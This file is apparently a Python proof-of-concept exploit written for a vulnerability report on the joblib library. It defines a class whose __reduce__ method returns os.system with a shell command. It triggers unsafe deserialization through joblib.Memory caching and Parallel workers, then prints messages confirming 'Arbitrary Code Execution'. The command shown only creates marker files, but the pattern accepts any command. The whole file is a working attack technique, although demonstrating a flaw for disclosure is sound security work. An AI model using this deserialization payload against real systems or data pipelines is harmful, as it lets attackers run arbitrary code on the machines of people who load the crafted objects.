File size: 2,032 Bytes
905ac41 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 |
import joblib
from joblib import Parallel, delayed
import os
import shutil
import time
# 1. Setup a dynamic cache directory using the current timestamp
# This ensures the exploit runs successfully every time the reviewer executes it
timestamp = int(time.time())
cache_dir = f"./cache_{timestamp}"
class JoblibExploit:
def __init__(self, vector_name):
self.vector_name = vector_name
def __reduce__(self):
# The core vulnerability: Unsafe Deserialization
# This command creates a unique success file for each vector
success_file = f"{self.vector_name}_SUCCESS"
return (os.system, (f'touch {success_file}',))
def run_memory_test():
print(f"[*] Testing Vector 1: joblib.Memory (Cache dir: {cache_dir})")
mem = joblib.Memory(cache_dir)
@mem.cache
def cached_function(data):
return data
# Triggering the exploit via the caching mechanism
cached_function(JoblibExploit("MEMORY"))
def run_parallel_test():
print("[*] Testing Vector 2: joblib.Parallel (Task Distribution)")
def worker(data):
return data
# Triggering the exploit via parallel worker distribution
try:
Parallel(n_jobs=2)(delayed(worker)(JoblibExploit("PARALLEL")) for _ in range(1))
except:
pass
def verify_results():
mem_ok = os.path.exists("MEMORY_SUCCESS")
par_ok = os.path.exists("PARALLEL_SUCCESS")
print("\n" + "="*30)
print(f"[+] Memory ACE Status: {'VULNERABLE' if mem_ok else 'FAILED'}")
print(f"[+] Parallel ACE Status: {'VULNERABLE' if par_ok else 'FAILED'}")
print("="*30)
if mem_ok and par_ok:
print("\n[CRITICAL] Exploitation Successful: Arbitrary Code Execution confirmed.")
# Optional: Cleanup the newly created cache directory
if os.path.exists(cache_dir):
shutil.rmtree(cache_dir)
if __name__ == "__main__":
print("--- Starting Joblib Full ACE Proof of Concept ---")
run_memory_test()
run_parallel_test()
verify_results()
|